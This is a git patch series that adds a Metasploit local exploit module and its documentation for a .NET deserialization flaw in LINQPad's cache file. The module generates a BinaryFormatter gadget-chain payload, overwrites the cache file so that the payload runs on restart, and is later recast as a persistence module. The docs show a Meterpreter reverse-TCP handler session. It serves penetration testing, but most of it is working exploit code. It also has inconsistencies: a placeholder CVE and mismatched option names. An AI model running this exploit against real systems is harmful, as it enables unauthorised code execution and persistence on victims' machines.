From 302052c692c71df52c9ec20eb2c1dc37db9a8ae4 Mon Sep 17 00:00:00 2001 From: Martin Sutovsky Date: Mon, 30 Dec 2024 15:57:59 +0100 Subject: [PATCH 1/6] LINQPad deserialization module init --- .../windows/local/linqpad_deserialization.md | 50 +++++++++++ .../windows/local/linqpad_deserialization.rb | 84 +++++++++++++++++++ 2 files changed, 134 insertions(+) create mode 100644 documentation/modules/exploit/windows/local/linqpad_deserialization.md create mode 100644 modules/exploits/windows/local/linqpad_deserialization.rb diff --git a/documentation/modules/exploit/windows/local/linqpad_deserialization.md b/documentation/modules/exploit/windows/local/linqpad_deserialization.md new file mode 100644 index 000000000000..a0a273806086 --- /dev/null +++ b/documentation/modules/exploit/windows/local/linqpad_deserialization.md @@ -0,0 +1,50 @@ +## LINQPad 5.48 Deserialization + +LINQPad is a scratchpad for .NET programming. Versions prior to 5.52 contain a deserialization vulnerability in processing cache file when program is starting. Application can be downloaded from [here](https://www.linqpad.net/). + +## Verification Steps +Steps: + +1. Install the application +2. Start msfconsole +3. Get Meterpreter/cmd shell +4. Run: `use windows/local/linqpad_deserialization` +5. Set payload - for example `set payload cmd/windows/generic` - and corresponding parameters +5. Set parameters `session`, `cache_path`, `linqpad_path` +6. Run exploit + +## Options + +### cache\_path + +The parameter sets path for folder, where vulnerable cache file is present. This is crucial part of the exploit as the folder can be used to identify whether the current version is vulnerable and the payload delivery is performed through cache file. + +### linqpad\_path + +Final part of exploit runs the LINQPad to trigger deserialization procedure. The `linpad_path` parameter sets the path to LINQPad binary, which is ran at the end of exploit. + +Example: + +``` +msf6 > use exploit/multi/handler +msf6 exploit(multi/handler) > set LHOST 192.168.95.128 +msf6 exploit(multi/handler) > set LPORT 4242 +msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp +msf6 exploit(multi/handler) > run +[*] Started reverse TCP handler on 192.168.95.128:4242 +[*] Meterpreter session 1 opened (192.168.95.128:4242 -> 192.168.95.130:53430) at 2024-12-30 12:46:16 +0100 + +meterpreter > background +[*] Backgrounding session 1... +msf6 exploit(multi/handler) > use windows/local/linqpad_deserialization +msf6 exploit(windows/local/linqpad_deserialization) > set LINQPAD_PATH C:/ProgramData/LINQPad/Updates50.AnyCPU/552/LINQPad.exe +msf6 exploit(windows/local/linqpad_deserialization) > set payload windows/exec/cmd +msf6 exploit(windows/local/linqpad_deserialization) > set cache_path C:/Users/ms/AppData/Local/LINQPad +msf6 exploit(windows/local/linqpad_deserialization) > set CMD calc.exe +msf6 exploit(windows/local/linqpad_deserialization) > set session 1 +msf6 exploit(windows/local/linqpad_deserialization) > exploit +[*] Exploit completed, but no session was created. +``` + +Previous example will run `calc.exe` when LINQPad will start. + diff --git a/modules/exploits/windows/local/linqpad_deserialization.rb b/modules/exploits/windows/local/linqpad_deserialization.rb new file mode 100644 index 000000000000..ed6052cec019 --- /dev/null +++ b/modules/exploits/windows/local/linqpad_deserialization.rb @@ -0,0 +1,84 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = NormalRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html + + # includes file?, directory? + include Msf::Post::File + + # includes generate + include Msf::Util::DotNetDeserialization + + def initialize(info = {}) + super( + update_info( + info, + # The Name should be just like the line of a Git commit - software name, + # vuln type, class. Preferably apply + # some search optimization so people can actually find the module. + # We encourage consistency between module name and file name. + 'Name' => 'LINQPad Deserialization Exploit', + 'Description' => %q{ + This module exploits a bug in LIQPad up to version 5.48.00. The bug is only exploitable in paid version of software. The core of a bug is cache file containing deserialized data, which attacker can overwrite with malicious payload. The data gets deserialized every time the app restarts. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'msutovsky-r7 ', + 'James Williams' # original research + ], + 'Platform' => 'win', + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [[ 'Windows', { 'Arch' => ARCH_CMD } ]], + # 'Privileged' => true, + 'References' => [ + [ 'URL', 'https://trustedsec.com/blog/discovering-a-deserialization-vulnerability-in-linqpad'], + [ 'CVE', '1978-1234'] + ], + 'DisclosureDate' => '2024-12-03', + 'DefaultTarget' => 0, + # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [ARTIFACTS_ON_DISK] + } + ) + ) + register_options([ + OptString.new('LINQPad_path', [true, "Path to LINQPad executable on target's machine", "C:\Users\ms\AppData\Local\LINQPad"]), + OptString.new('Cache_path', [true, 'Path to cache file directory containing deserialized data']) + ]) + end + + # Simplify pulling the writable directory variable + + def check + if datastore['LINQPad_path'].blank? || !file?(datastore['LINQPad_path']) + return Exploit::CheckCode::Unknown('LINQPad binary not specified or doesn\'t exist') + elsif datastore['Cache_path'].blank? || !directory?(datastore['Cache_path']) || !file?(datastore['cache_path'] + '/autorefcache46.1.dat') + return Exploit::CheckCode::Unknown('Cache directory doesn\'t exist') + elsif !file?(datastore['cache_path'] + '/autorefcache46.1.dat') + return Exploit::CheckCode::Unknown('Cannot find cache file') + elsif file?(datastore['cache_path'] + '/autorefcache46.2.dat') + return Exploit::CheckCode::Safe('Contains not vulnerable version of LINQPad') + else + return Exploit::CheckCode::Vulnerable('LINPad and vulnerable cache file present, target possibly exploitable') + end + end + + def exploit + # generate payload + dotnet_payload = ::Msf::Util::DotNetDeserialization.generate( + payload.encoded, # this is the Operating System command to run + gadget_chain: :TextFormattingRunProperties, + formatter: :BinaryFormatter ) + # try to overwrite cache file + fail_with(Failure::PayloadFailed, 'Writing payload to cache file failed') unless write_file(datastore['Cache_path'] + '/AutoRefCache46.1.dat', dotnet_payload) + + # run LINQPad and trigger deserialization + fail_with(Failure::PayloadFailed, 'Running LINQPad failed') unless cmd_exec(datastore['LINQPad_path']) + end +end From 058e7be47a3ce97a5283cfae19bc3a8376800ac2 Mon Sep 17 00:00:00 2001 From: Martin Sutovsky Date: Mon, 30 Dec 2024 16:13:24 +0100 Subject: [PATCH 2/6] Cleaning up module --- modules/exploits/windows/local/linqpad_deserialization.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/linqpad_deserialization.rb b/modules/exploits/windows/local/linqpad_deserialization.rb index ed6052cec019..2214f024a904 100644 --- a/modules/exploits/windows/local/linqpad_deserialization.rb +++ b/modules/exploits/windows/local/linqpad_deserialization.rb @@ -74,7 +74,8 @@ def exploit dotnet_payload = ::Msf::Util::DotNetDeserialization.generate( payload.encoded, # this is the Operating System command to run gadget_chain: :TextFormattingRunProperties, - formatter: :BinaryFormatter ) + formatter: :BinaryFormatter + ) # try to overwrite cache file fail_with(Failure::PayloadFailed, 'Writing payload to cache file failed') unless write_file(datastore['Cache_path'] + '/AutoRefCache46.1.dat', dotnet_payload) From 93c2360741518d3bab712c097e07d12090eab50e Mon Sep 17 00:00:00 2001 From: Martin Sutovsky Date: Thu, 9 Jan 2025 15:30:50 +0100 Subject: [PATCH 3/6] Renaming module to persistence module instead --- .../linqpad_deserialization_persistence.rb | 85 +++++++++++++++++++ 1 file changed, 85 insertions(+) create mode 100644 modules/exploits/windows/local/linqpad_deserialization_persistence.rb diff --git a/modules/exploits/windows/local/linqpad_deserialization_persistence.rb b/modules/exploits/windows/local/linqpad_deserialization_persistence.rb new file mode 100644 index 000000000000..2214f024a904 --- /dev/null +++ b/modules/exploits/windows/local/linqpad_deserialization_persistence.rb @@ -0,0 +1,85 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = NormalRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html + + # includes file?, directory? + include Msf::Post::File + + # includes generate + include Msf::Util::DotNetDeserialization + + def initialize(info = {}) + super( + update_info( + info, + # The Name should be just like the line of a Git commit - software name, + # vuln type, class. Preferably apply + # some search optimization so people can actually find the module. + # We encourage consistency between module name and file name. + 'Name' => 'LINQPad Deserialization Exploit', + 'Description' => %q{ + This module exploits a bug in LIQPad up to version 5.48.00. The bug is only exploitable in paid version of software. The core of a bug is cache file containing deserialized data, which attacker can overwrite with malicious payload. The data gets deserialized every time the app restarts. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'msutovsky-r7 ', + 'James Williams' # original research + ], + 'Platform' => 'win', + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [[ 'Windows', { 'Arch' => ARCH_CMD } ]], + # 'Privileged' => true, + 'References' => [ + [ 'URL', 'https://trustedsec.com/blog/discovering-a-deserialization-vulnerability-in-linqpad'], + [ 'CVE', '1978-1234'] + ], + 'DisclosureDate' => '2024-12-03', + 'DefaultTarget' => 0, + # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [ARTIFACTS_ON_DISK] + } + ) + ) + register_options([ + OptString.new('LINQPad_path', [true, "Path to LINQPad executable on target's machine", "C:\Users\ms\AppData\Local\LINQPad"]), + OptString.new('Cache_path', [true, 'Path to cache file directory containing deserialized data']) + ]) + end + + # Simplify pulling the writable directory variable + + def check + if datastore['LINQPad_path'].blank? || !file?(datastore['LINQPad_path']) + return Exploit::CheckCode::Unknown('LINQPad binary not specified or doesn\'t exist') + elsif datastore['Cache_path'].blank? || !directory?(datastore['Cache_path']) || !file?(datastore['cache_path'] + '/autorefcache46.1.dat') + return Exploit::CheckCode::Unknown('Cache directory doesn\'t exist') + elsif !file?(datastore['cache_path'] + '/autorefcache46.1.dat') + return Exploit::CheckCode::Unknown('Cannot find cache file') + elsif file?(datastore['cache_path'] + '/autorefcache46.2.dat') + return Exploit::CheckCode::Safe('Contains not vulnerable version of LINQPad') + else + return Exploit::CheckCode::Vulnerable('LINPad and vulnerable cache file present, target possibly exploitable') + end + end + + def exploit + # generate payload + dotnet_payload = ::Msf::Util::DotNetDeserialization.generate( + payload.encoded, # this is the Operating System command to run + gadget_chain: :TextFormattingRunProperties, + formatter: :BinaryFormatter + ) + # try to overwrite cache file + fail_with(Failure::PayloadFailed, 'Writing payload to cache file failed') unless write_file(datastore['Cache_path'] + '/AutoRefCache46.1.dat', dotnet_payload) + + # run LINQPad and trigger deserialization + fail_with(Failure::PayloadFailed, 'Running LINQPad failed') unless cmd_exec(datastore['LINQPad_path']) + end +end From 2f351eae33aa696a7f8eba25a49ac1dd0a38c9d7 Mon Sep 17 00:00:00 2001 From: Martin Sutovsky Date: Fri, 10 Jan 2025 11:12:21 +0100 Subject: [PATCH 4/6] Addressing some issues --- .../windows/local/linqpad_deserialization.rb | 85 ------------------- .../linqpad_deserialization_persistence.rb | 21 +++-- 2 files changed, 13 insertions(+), 93 deletions(-) delete mode 100644 modules/exploits/windows/local/linqpad_deserialization.rb diff --git a/modules/exploits/windows/local/linqpad_deserialization.rb b/modules/exploits/windows/local/linqpad_deserialization.rb deleted file mode 100644 index 2214f024a904..000000000000 --- a/modules/exploits/windows/local/linqpad_deserialization.rb +++ /dev/null @@ -1,85 +0,0 @@ -## -# This module requires Metasploit: https://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -class MetasploitModule < Msf::Exploit::Local - Rank = NormalRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html - - # includes file?, directory? - include Msf::Post::File - - # includes generate - include Msf::Util::DotNetDeserialization - - def initialize(info = {}) - super( - update_info( - info, - # The Name should be just like the line of a Git commit - software name, - # vuln type, class. Preferably apply - # some search optimization so people can actually find the module. - # We encourage consistency between module name and file name. - 'Name' => 'LINQPad Deserialization Exploit', - 'Description' => %q{ - This module exploits a bug in LIQPad up to version 5.48.00. The bug is only exploitable in paid version of software. The core of a bug is cache file containing deserialized data, which attacker can overwrite with malicious payload. The data gets deserialized every time the app restarts. - }, - 'License' => MSF_LICENSE, - 'Author' => [ - 'msutovsky-r7 ', - 'James Williams' # original research - ], - 'Platform' => 'win', - 'SessionTypes' => [ 'shell', 'meterpreter' ], - 'Targets' => [[ 'Windows', { 'Arch' => ARCH_CMD } ]], - # 'Privileged' => true, - 'References' => [ - [ 'URL', 'https://trustedsec.com/blog/discovering-a-deserialization-vulnerability-in-linqpad'], - [ 'CVE', '1978-1234'] - ], - 'DisclosureDate' => '2024-12-03', - 'DefaultTarget' => 0, - # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html - 'Notes' => { - 'Stability' => [CRASH_SAFE], - 'Reliability' => [REPEATABLE_SESSION], - 'SideEffects' => [ARTIFACTS_ON_DISK] - } - ) - ) - register_options([ - OptString.new('LINQPad_path', [true, "Path to LINQPad executable on target's machine", "C:\Users\ms\AppData\Local\LINQPad"]), - OptString.new('Cache_path', [true, 'Path to cache file directory containing deserialized data']) - ]) - end - - # Simplify pulling the writable directory variable - - def check - if datastore['LINQPad_path'].blank? || !file?(datastore['LINQPad_path']) - return Exploit::CheckCode::Unknown('LINQPad binary not specified or doesn\'t exist') - elsif datastore['Cache_path'].blank? || !directory?(datastore['Cache_path']) || !file?(datastore['cache_path'] + '/autorefcache46.1.dat') - return Exploit::CheckCode::Unknown('Cache directory doesn\'t exist') - elsif !file?(datastore['cache_path'] + '/autorefcache46.1.dat') - return Exploit::CheckCode::Unknown('Cannot find cache file') - elsif file?(datastore['cache_path'] + '/autorefcache46.2.dat') - return Exploit::CheckCode::Safe('Contains not vulnerable version of LINQPad') - else - return Exploit::CheckCode::Vulnerable('LINPad and vulnerable cache file present, target possibly exploitable') - end - end - - def exploit - # generate payload - dotnet_payload = ::Msf::Util::DotNetDeserialization.generate( - payload.encoded, # this is the Operating System command to run - gadget_chain: :TextFormattingRunProperties, - formatter: :BinaryFormatter - ) - # try to overwrite cache file - fail_with(Failure::PayloadFailed, 'Writing payload to cache file failed') unless write_file(datastore['Cache_path'] + '/AutoRefCache46.1.dat', dotnet_payload) - - # run LINQPad and trigger deserialization - fail_with(Failure::PayloadFailed, 'Running LINQPad failed') unless cmd_exec(datastore['LINQPad_path']) - end -end diff --git a/modules/exploits/windows/local/linqpad_deserialization_persistence.rb b/modules/exploits/windows/local/linqpad_deserialization_persistence.rb index 2214f024a904..210d622158d1 100644 --- a/modules/exploits/windows/local/linqpad_deserialization_persistence.rb +++ b/modules/exploits/windows/local/linqpad_deserialization_persistence.rb @@ -48,21 +48,22 @@ def initialize(info = {}) ) ) register_options([ - OptString.new('LINQPad_path', [true, "Path to LINQPad executable on target's machine", "C:\Users\ms\AppData\Local\LINQPad"]), - OptString.new('Cache_path', [true, 'Path to cache file directory containing deserialized data']) + OptString.new('LINQPAD_FILE', [true, 'Path to LINQPad executable on target\'s machine']), + OptString.new('CACHE_PATH', [true, 'Path to cache file directory containing deserialized data']), + OptBool.new('CLEANUP', [false, 'Restore original cache file when exploit finish']) ]) end # Simplify pulling the writable directory variable def check - if datastore['LINQPad_path'].blank? || !file?(datastore['LINQPad_path']) + if datastore['LINQPAD_PATH'].blank? || !file?(datastore['LINQPAD_PATH']) return Exploit::CheckCode::Unknown('LINQPad binary not specified or doesn\'t exist') - elsif datastore['Cache_path'].blank? || !directory?(datastore['Cache_path']) || !file?(datastore['cache_path'] + '/autorefcache46.1.dat') + elsif datastore['CACHE_PATH'].blank? || !directory?(datastore['Cache_path']) || !file?(datastore['CACHE_PATH'] + '/autorefcache46.1.dat') return Exploit::CheckCode::Unknown('Cache directory doesn\'t exist') - elsif !file?(datastore['cache_path'] + '/autorefcache46.1.dat') + elsif !file?(datastore['CACHE_PATH'] + '/autorefcache46.1.dat') return Exploit::CheckCode::Unknown('Cannot find cache file') - elsif file?(datastore['cache_path'] + '/autorefcache46.2.dat') + elsif file?(datastore['CACHE_PATH'] + '/autorefcache46.2.dat') return Exploit::CheckCode::Safe('Contains not vulnerable version of LINQPad') else return Exploit::CheckCode::Vulnerable('LINPad and vulnerable cache file present, target possibly exploitable') @@ -77,9 +78,13 @@ def exploit formatter: :BinaryFormatter ) # try to overwrite cache file - fail_with(Failure::PayloadFailed, 'Writing payload to cache file failed') unless write_file(datastore['Cache_path'] + '/AutoRefCache46.1.dat', dotnet_payload) + fail_with(Failure::PayloadFailed, 'Writing payload to cache file failed') unless write_file(datastore['CACHE_PATH'] + '/AutoRefCache46.1.dat', dotnet_payload) # run LINQPad and trigger deserialization - fail_with(Failure::PayloadFailed, 'Running LINQPad failed') unless cmd_exec(datastore['LINQPad_path']) + fail_with(Failure::PayloadFailed, 'Running LINQPad failed') unless cmd_exec(datastore['LINQPAD_PATH']) + + # add cleanup option + register_file_for_cleanup(datastore['CACHE_PATH']) if datastore['CLEANUP'] + end end From 689e44f3ff37065a69a9901fd9704d59b7e4e9d5 Mon Sep 17 00:00:00 2001 From: Martin Sutovsky Date: Fri, 10 Jan 2025 11:12:32 +0100 Subject: [PATCH 5/6] Addressing some issues --- .../windows/local/linqpad_deserialization_persistence.rb | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/local/linqpad_deserialization_persistence.rb b/modules/exploits/windows/local/linqpad_deserialization_persistence.rb index 210d622158d1..e0c6696bcfce 100644 --- a/modules/exploits/windows/local/linqpad_deserialization_persistence.rb +++ b/modules/exploits/windows/local/linqpad_deserialization_persistence.rb @@ -48,9 +48,9 @@ def initialize(info = {}) ) ) register_options([ - OptString.new('LINQPAD_FILE', [true, 'Path to LINQPad executable on target\'s machine']), - OptString.new('CACHE_PATH', [true, 'Path to cache file directory containing deserialized data']), - OptBool.new('CLEANUP', [false, 'Restore original cache file when exploit finish']) + OptString.new('LINQPAD_FILE', [true, 'Path to LINQPad executable on target\'s machine']), + OptString.new('CACHE_PATH', [true, 'Path to cache file directory containing deserialized data']), + OptBool.new('CLEANUP', [false, 'Restore original cache file when exploit finish']) ]) end @@ -85,6 +85,5 @@ def exploit # add cleanup option register_file_for_cleanup(datastore['CACHE_PATH']) if datastore['CLEANUP'] - end end From f6671795156601272e81c1af77b5ff74b5ae60b0 Mon Sep 17 00:00:00 2001 From: Martin Sutovsky Date: Fri, 24 Jan 2025 16:54:27 +0100 Subject: [PATCH 6/6] Removing execution of LINQPad file due to module recategorisation to persistence --- .../windows/local/linqpad_deserialization_persistence.rb | 3 --- 1 file changed, 3 deletions(-) diff --git a/modules/exploits/windows/local/linqpad_deserialization_persistence.rb b/modules/exploits/windows/local/linqpad_deserialization_persistence.rb index e0c6696bcfce..f5132ab6eda5 100644 --- a/modules/exploits/windows/local/linqpad_deserialization_persistence.rb +++ b/modules/exploits/windows/local/linqpad_deserialization_persistence.rb @@ -80,9 +80,6 @@ def exploit # try to overwrite cache file fail_with(Failure::PayloadFailed, 'Writing payload to cache file failed') unless write_file(datastore['CACHE_PATH'] + '/AutoRefCache46.1.dat', dotnet_payload) - # run LINQPad and trigger deserialization - fail_with(Failure::PayloadFailed, 'Running LINQPad failed') unless cmd_exec(datastore['LINQPAD_PATH']) - # add cleanup option register_file_for_cleanup(datastore['CACHE_PATH']) if datastore['CLEANUP'] end